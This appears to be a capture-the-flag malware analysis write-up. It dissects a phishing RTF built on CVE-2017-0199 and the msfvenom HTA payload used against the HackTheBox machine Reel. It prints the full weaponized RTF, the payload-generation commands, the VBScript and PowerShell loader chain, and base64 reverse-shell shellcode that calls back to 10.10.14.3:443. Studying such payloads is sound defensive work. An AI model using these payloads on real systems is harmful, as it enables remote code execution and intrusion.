Malware Analysis: Phishing Docs from HTB Reel
I regularly use tools like msfvenom or scripts from GitHub to create attacks in HackTheBox or PWK. I wanted to take a minute to look under the hood of the phishing documents I generated to gain access to Reel in HTB and understand what they are doing. By the end, we’ll understand how the RTF abuses a COM object to download and launch a remote HTA. In the HTA, we’ll see layers of script calling each other, until I find some shellcode that PowerShell loads into memory and runs. I’ll do some initial analysis of that shellcode to see the network connection attempts.
Overview
I got a shell on the HackTheBox host Reel by sending a malicious rtf file that takes advantage of CVE-2017-0199 (check out the Reel write-up for complete details). The attack also makes use of a malicious HTA file. I’ll examine both of these documents to see what they are doing and how they work.
RTF
Generation / Resulting File
I generated the rtf file with the following command using the script on bhdresh’s GitHub:
# python cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.3/msfv.hta -t rtf -x 0
The document is actually short enough that I can just show it here:
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author }
{\operator }
}
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass Word.Document.8}
{\*\objdata 0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
010000020900000001000000000000000000000000000000a4000000e0c9ea79f9bace118c8200aa004ba90b8c00000068007400740070003a002f002f00310030002e00310030002e00310034002e0033002f006d007300660076002e0068007400610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff0609020000000000c00000000000004600000000ffffffff0000000000000000906660a637b5d201000000000000000000000000000000000000000000000000100203000d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0105000000000000}
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore }
}
RTF Stream Analysis
Reading the raw file isn’t a very useful way to do analysis, but it’s worth being comfortable with an rtf file. It’s just ASCII text, with tags and data. In this case, you may have noticed the embedded \objclass Word.Document.8.
A better tool for rtf analysis is rtfdump.py from Didier Stevens. It shows the various streams in the rtf:
root@kali# rtfdump.py invoice.rtf
1 Level 1 c= 4 p=00000000 l= 5723 h= 5223; 1024 b= 0 u= 46 \rtf1
2 Level 2 c= 2 p=000000b9 l= 31 h= 0; 1 b= 0 u= 0 \info
3 Level 3 c= 0 p=000000c0 l= 9 h= 0; 0 b= 0 u= 0 \author
4 Level 3 c= 0 p=000000cb l= 11 h= 0; 0 b= 0 u= 0 \operator
5 Level 2 c= 1 p=000000da l= 75 h= 16; 4 b= 0 u= 36 \*\xmlnstbl
6 Level 3 c= 0 p=000000e7 l= 61 h= 16; 4 b= 0 u= 36 \xmlns1
7 Level 2 c= 1 p=00000127 l= 5410 h= 5207; 1024 b= 0 u= 10
8 Level 3 c= 3 p=00000129 l= 5407 h= 5207; 1024 b= 0 u= 10 \object
9 Level 4 c= 0 p=00000179 l= 28 h= 5; 1 b= 0 u= 10 \*\objclass Word.Document.8
10 Level 4 c= 0 p=00000197 l= 5234 h= 5202; 1024 b= 0 O u= 0 \*\objdata
Name: 'OLE2Link\x00' Size: 2560 md5: 08b294980ca01cc74840cb1a64af4880 magic: d0cf11e0
11 Level 4 c= 1 p=0000160b l= 60 h= 0; 8 b= 0 u= 0 \result
12 Level 5 c= 0 p=00001614 l= 50 h= 0; 8 b= 0 u= 0 \rtlch
13 Level 2 c= 0 p=0000164b l= 14 h= 0; 0 b= 0 u= 0 \*\datastore
14 Level 0 c= 0 p=0000165c l= 0 h= 0; 0 b= 0 u= 0
rtfdump has a -f O option to just show OLE objects:
root@kali# rtfdump.py invoice.rtf -f O
10 Level 4 c= 0 p=00000197 l= 5234 h= 5202; 1024 b= 0 O u= 0 \*\objdata
Name: 'OLE2Link\x00' Size: 2560 md5: 08b294980ca01cc74840cb1a64af4880 magic: d0cf11e0
To look at that stream, I’ll use -s 10, and -H to convert the hex to binary:
root@kali# rtfdump.py invoice.rtf -s 10 -H | head
00000000: 01 05 00 00 02 00 00 00 09 00 00 00 4F 4C 45 32 ............OLE2
00000010: 4C 69 6E 6B 00 00 00 00 00 00 00 00 00 00 0A 00 Link............
00000020: 00 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 .........>......
00000040: 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................
00000050: 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 ................
00000060: 00 01 00 00 00 FE FF FF FF 00 00 00 00 00 00 00 ................
00000070: 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000080: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000090: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
At offset 0x21, the D0CF11E0 signature starts. This is the header for an Object Linking and Embedding (OLE) Compound File (CF), which is used to store many different file types, including older Office formats (.doc, .xls, .ppt), as well as many other Windows files.
CVE-2017-0199 was widely reported as the OLE2Link bug, and we see that object present here as well.
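To make the 0x21 offset concrete, here is a minimal Python sketch that walks the header sitting in front of the compound file. It assumes the bytes follow the OLE 1.0 embedded-object layout (version, format ID, three length-prefixed strings, then a data size). The function names are my own, and the hex is just the first 41 bytes of the objdata shown earlier.

```python
import struct

# First 41 bytes of the objdata hex from invoice.rtf (copied from the file above).
OBJDATA_HEX = (
    "0105000002000000"
    "090000004f4c45324c696e6b000000000000000000000a0000"
    "d0cf11e0a1b11ae1"
)


def read_lp_string(buf, pos):
    """Read a 4-byte little-endian length, then that many bytes."""
    (length,) = struct.unpack_from("<I", buf, pos)
    start = pos + 4
    return buf[start:start + length], start + length


def parse_ole1_header(buf):
    """Assumed layout: version, format ID, class/topic/item names, data size."""
    version, format_id = struct.unpack_from("<II", buf, 0)
    pos = 8
    class_name, pos = read_lp_string(buf, pos)
    _topic, pos = read_lp_string(buf, pos)
    _item, pos = read_lp_string(buf, pos)
    (data_size,) = struct.unpack_from("<I", buf, pos)
    return {
        "version": version,
        "format_id": format_id,
        "class_name": class_name.rstrip(b"\x00").decode("ascii"),
        "data_size": data_size,
        "data_offset": pos + 4,  # first byte after the size field
    }


raw = bytes.fromhex(OBJDATA_HEX)
header = parse_ole1_header(raw)
magic = raw[header["data_offset"]:header["data_offset"] + 4].hex()
print(header, magic)
```

If the layout assumption holds, the class name, data size, and data offset should line up with what rtfdump.py reports for this object.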
I’ll dump the OLE stream to a file:
root@kali# rtfdump.py invoice.rtf -s 10 -H -E -d > invoice.rtf.ole
root@kali# file invoice.rtf.ole
invoice.rtf.ole: Composite Document File V2 Document, Cannot read section info
root@kali# wc invoice.rtf.ole
1 7 2560 invoice.rtf.ole
OLE Analysis
Another tool from Didier Stevens, oledump.py, will allow me to look at this file, showing it has three streams:
root@kali# oledump.py invoice.rtf.ole
1: 240 '\x01Ole'
2: 183 '\x03LinkInfo'
3: 6 '\x03ObjInfo'
The first one turns out to be interesting:
root@kali# oledump.py invoice.rtf.ole -s 1
00000000: 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 A4 00 00 00 E0 C9 EA 79 ...............y
00000020: F9 BA CE 11 8C 82 00 AA 00 4B A9 0B 8C 00 00 00 .........K......
00000030: 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 31 00 h.t.t.p.:././.1.
00000040: 30 00 2E 00 31 00 30 00 2E 00 31 00 34 00 2E 00 0...1.0...1.4...
00000050: 33 00 2F 00 6D 00 73 00 66 00 76 00 2E 00 68 00 3./.m.s.f.v...h.
00000060: 74 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 t.a.............
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000A0: 00 00 00 00 79 58 81 F4 3B 1D 7F 48 AF 2C 82 5D ....yX..;..H.,.]
000000B0: C4 85 27 63 00 00 00 00 A5 AB 00 00 FF FF FF FF ..'c............
000000C0: 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
000000D0: 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ................
000000E0: 90 66 60 A6 37 B5 D2 01 00 00 00 00 00 00 00 00 .f`.7...........
Right away, I notice the url I used to build the file (the -el option tells strings to look for 16-bit little endian strings):
root@kali# oledump.py invoice.rtf.ole -s 1 -d | strings -el
http://10.10.14.3/msfv.hta
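For anyone without strings handy, a rough Python equivalent of the -el search might look like the sketch below. The sample bytes are offsets 0x20 through 0x6F of the stream dump above; the function name and the minimum length of 4 are my own choices.

```python
import re

# Offsets 0x20-0x6F of the \x01Ole stream, copied from the hex dump above.
SAMPLE = bytes.fromhex(
    "F9 BA CE 11 8C 82 00 AA 00 4B A9 0B 8C 00 00 00 "
    "68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 31 00 "
    "30 00 2E 00 31 00 30 00 2E 00 31 00 34 00 2E 00 "
    "33 00 2F 00 6D 00 73 00 66 00 76 00 2E 00 68 00 "
    "74 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00"
)


def utf16le_strings(data, min_len=4):
    """Return runs of printable ASCII characters stored as 16-bit little endian."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


found = utf16le_strings(SAMPLE)
print(found)
```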
The url comes right after this hex string, separated only by the four bytes 8C 00 00 00: E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B. According to the GUID spec, a GUID is defined as follows:
typedef struct _GUID {
  DWORD Data1;
  WORD Data2;
  WORD Data3;
  BYTE Data4[8];
} GUID;
Members
Data1: Specifies the first 8 hexadecimal digits of the GUID.
Data2: Specifies the first group of 4 hexadecimal digits.
Data3: Specifies the second group of 4 hexadecimal digits.
Data4: Array of 8 bytes. The first 2 bytes contain the third group of 4 hexadecimal digits. The remaining 6 bytes contain the final 12 hexadecimal digits.
Since the first three fields are little-endian integers, their byte order reverses when translating to a GUID. The last field is a byte array, so its byte order stays the same. That means E0C9EA79 F9BA CE11 8C8200AA004BA90B converts to {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}. That CLSID represents URL Moniker, processed by urlmon.dll. There’s a ton in the Microsoft documentation if you are interested.
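The byte swapping is easy to get wrong by hand, so here is a small Python sketch of the conversion. It does the work twice: once with struct following the field layout in the definition above, and once with the standard library's uuid module, whose bytes_le form uses the same little-endian convention for the first three fields. The function names are mine.

```python
import struct
import uuid

# The 16 bytes that precede the URL in the \x01Ole stream.
RAW = bytes.fromhex("E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B")


def clsid_manual(raw):
    """Unpack DWORD, WORD, WORD as little endian; keep Data4 in stored order."""
    data1, data2, data3, data4 = struct.unpack("<IHH8s", raw)
    return "{%08X-%04X-%04X-%s-%s}" % (
        data1, data2, data3, data4[:2].hex().upper(), data4[2:].hex().upper()
    )


def clsid_uuid(raw):
    """Same conversion using uuid.UUID(bytes_le=...)."""
    return "{%s}" % str(uuid.UUID(bytes_le=raw)).upper()


print(clsid_manual(RAW))
print(clsid_uuid(RAW))
```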
Because of how this process handles the url, the link does not need to point to a file ending in .hta. For the response to be handled as an hta, the file can either have the .hta extension or the webserver can respond with a Content-Type: application/hta header.
HTA
Generation / Resulting File
I created the HTA file using the following msfvenom command:
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f hta-psh -o msfv.hta
The result is a simple VBScript (with the large base64 string replaced with [base64 string] for readability):
<script language="VBScript">
window.moveTo -4000, -4000
Set cRDBfShauNsm = CreateObject("Wscript.Shell")
Set h8iZy_c = CreateObject("Scripting.FileSystemObject")
For each path in Split(cRDBfShauNsm.ExpandEnvironmentStrings("%PSModulePath%"),";")
If h8iZy_c.FileExists(path + "\..\powershell.exe") Then
cRDBfShauNsm.Run "powershell.exe -nop -w hidden -e [base64 string]",0
Exit For
End If
Next
window.close()
</script>
This script does six things:
- Moves itself off screen.
- Creates a Wscript.Shell object.
- Creates a Scripting.FileSystemObject object.
- Uses the Scripting.FileSystemObject to verify that powershell.exe is on the host.
- Assuming it finds powershell.exe, it runs an encoded command.
- Closes its own window.
Decoding PowerShell
That base64 encoded command decodes to (with spacing added by me and a long, base64 encoded string removed for readability):
if([IntPtr]::Size -eq 4) {
$b='powershell.exe'
} else {
$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'
};
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String([BASE64 STRING REMOVED]))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);
This basically creates a windowless process that is powershell -nop -w hidden -c [results of decompression / decoding].
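One detail worth calling out about the first layer: the argument to powershell.exe -e is base64 over UTF-16LE text, so a plain base64 -d leaves a null byte after every character. A minimal Python sketch of decoding that layer follows. The function names are mine, and since the real string is elided above, the demo uses a harmless stand-in command.

```python
import base64


def decode_encoded_command(b64_text):
    """Decode a PowerShell -e / -EncodedCommand argument (base64 of UTF-16LE)."""
    return base64.b64decode(b64_text).decode("utf-16-le")


def encode_command(script):
    """Inverse operation, used here only to build a demo input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


demo = encode_command("whoami")  # stand-in for the elided [base64 string]
print(demo)
print(decode_encoded_command(demo))
```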
Decompressing Command
To decompress this command, I’ll need to first base64 decode, then gzip decompress. My first instinct is to do this with the command line:
# echo [base64 string] | base64 -d | gunzip
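The same two steps can be sketched in Python with only the standard library. The helper names are my own, and because the real string is elided here, the demo builds its own input by compressing a harmless one-liner first.

```python
import base64
import gzip


def unwrap_layer(b64_text):
    """Base64 decode, then gzip decompress, and return the text inside."""
    compressed = base64.b64decode(b64_text)
    return gzip.decompress(compressed).decode("utf-8", errors="replace")


def wrap_layer(script):
    """Inverse operation, used here only to build a demo input."""
    return base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")


demo = wrap_layer("Write-Output 'inner script'")  # stand-in for [base64 string]
print(unwrap_layer(demo))
```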
But I figured I’d take this opportunity to show off another tool: CyberChef. If you like GUIs, or just want the ability to play around with chains of operations on data, it’s an awesome tool. It lives on the GCHQ GitHub, and you can also download a copy and run it locally.
To use it, I’ll build a recipe with the operations I want to apply (in this case From Base64 and then Gunzip), give my data as “Input”, and hit “Bake!”:
function oUO {
Param ($fpx, $mPUE0)
$q_L = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $q_L.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($q_L.GetMethod('GetModuleHandle')).Invoke($null, @($fpx)))), $mPUE0))
}
function iIDi2 {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $zJ,
[Parameter(Position = 1)] [Type] $dRbp = [Void]
)
$gRM = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$gRM.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $zJ).SetImplementationFlags('Runtime, Managed')
$gRM.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $dRbp, $zJ).SetImplementationFlags('Runtime, Managed')
return $gRM.CreateType()
}
[Byte[]]$nz = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixL$
jV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VUFBQUEBQQFBo6g/f4P/Vl2oFaAoKDgNoAgABu4nmahBWV2iZpXRh/9WFwHQM/04Idexo8LWiVv/VaGNtZACJ41dXVzH2ahJZVuL9ZsdEJDwBAY1EJBDGAERUUFZWVkZWTlZWU1Zoecw/hv/VieBOVkb/MGgIhx1g/9W78LWiVmimlb2d/9U8B$
wKgPvgdQW7RxNyb2oAU//V")
$md = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oUO kernel32.dll VirtualAlloc), (iIDi2 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $nz.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($nz, 0, $md, $nz.length)
$zw = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oUO kernel32.dll CreateThread), (iIDi2 @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$md,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oUO kernel32.dll WaitForSingleObject), (iIDi2 @([IntPtr], [Int32]))).Invoke($zw,0xffffffff) | Out-Null
The part that jumped out to me is that the first function, oUO, looks like it is getting addresses for given functions, and then it’s called at the end to get VirtualAlloc, CreateThread, and WaitForSingleObject. So the script allocates space to write to, decodes yet another base64 encoded string, and copies it into that space. The address returned by VirtualAlloc is stored in $md, which is then passed to CreateThread as the thread’s start address.
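The numeric arguments in those calls are standard Win32 constants, and naming them makes the intent clearer. The sketch below is only a lookup table in Python; the constant values are from the Windows headers, and the helper names are mine.

```python
# Allocation type bits accepted by VirtualAlloc.
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}

# A few page protection values (not an exhaustive list).
PAGE_PROTECT = {
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

INFINITE = 0xFFFFFFFF  # WaitForSingleObject timeout meaning "wait forever"


def decode_alloc_type(value):
    """List the allocation type flags set in value."""
    return [name for bit, name in sorted(ALLOC_TYPES.items()) if value & bit]


def decode_protect(value):
    """Name a page protection constant, falling back to hex if unknown."""
    return PAGE_PROTECT.get(value, hex(value))


# Arguments taken from the VirtualAlloc and WaitForSingleObject calls above.
print(decode_alloc_type(0x3000), decode_protect(0x40), 0xFFFFFFFF == INFINITE)
```

Read that way, the loader asks for committed, reserved memory that is readable, writable, and executable, then waits on the new thread with no timeout.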
Shellcode Analysis
I dumped the shellcode to a file by just doing echo [base64 string] | base64 -d > shellcode, and moved it to a Windows host. I opened it with scdbg, a tool that emulates shellcode and shows you the API calls it makes. This tool can take all kinds of options, but this case is pretty simple. I’ll pass it /f with my shellcode file and /s -1 to run unlimited steps:
C:\Users\REM\Desktop>scdbg /f msfv_shell_rev_tcp_shellcode /s -1
Loaded 144 bytes from file msfv_shell_rev_tcp_shellcode
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000
40109b LoadLibraryA(ws2_32)
4010ab WSAStartup(190)
4010ba WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010e4 ExitProcess(-1157562366)
Stepcount 2079688
So I see the shellcode opening a socket and connecting back to the host/port that I gave it when I created the hta. scdbg only emulates these API calls, so I don’t see what happens on a successful connection.
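The callback address can also be pulled straight out of the bytes without emulation. The sketch below decodes a 24-character slice copied from the middle of the base64 shellcode above (chosen so that it decodes on its own) and looks for two x86 push instructions that build a sockaddr_in on the stack. That byte pattern is my assumption about how this particular payload is laid out, not a general rule, and the names are hypothetical.

```python
import base64
import ipaddress
import re
import struct

# 24 characters copied from the middle of the base64 shellcode above.
FRAGMENT_B64 = "l2oFaAoKDgNoAgABu4nmahBW"

# Assumed pattern: push <4-byte ip> (68 xx xx xx xx) followed by
# push <AF_INET=2, port> (68 02 00 pp pp), with the port in network byte order.
SOCKADDR_PUSHES = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)


def find_callback(code):
    """Return (ip, port) if the assumed push pattern is present, else None."""
    match = SOCKADDR_PUSHES.search(code)
    if match is None:
        return None
    ip = str(ipaddress.IPv4Address(match.group(1)))
    (port,) = struct.unpack(">H", match.group(2))
    return ip, port


callback = find_callback(base64.b64decode(FRAGMENT_B64))
print(callback)
```

The result should agree with the connect calls that scdbg reported.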
Summary
It’s certainly not too hard to use msfvenom or scripts from GitHub to create malicious payloads. But it is also worthwhile to open them and see what they are actually doing. In this case, I have an RTF, which abuses the URL Moniker COM object to request and run an HTA file. The HTA file uses VBScript to launch PowerShell, which decompresses and launches some more PowerShell, which loads some shellcode, which makes network connections to the IP/port that I gave it when I built the HTA with msfvenom. I could pull this shellcode into a debugger (x64dbg or Immunity) and allow it to talk back to my Kali box if I wanted to see more of what it does (and if that’s interesting to you, leave a comment).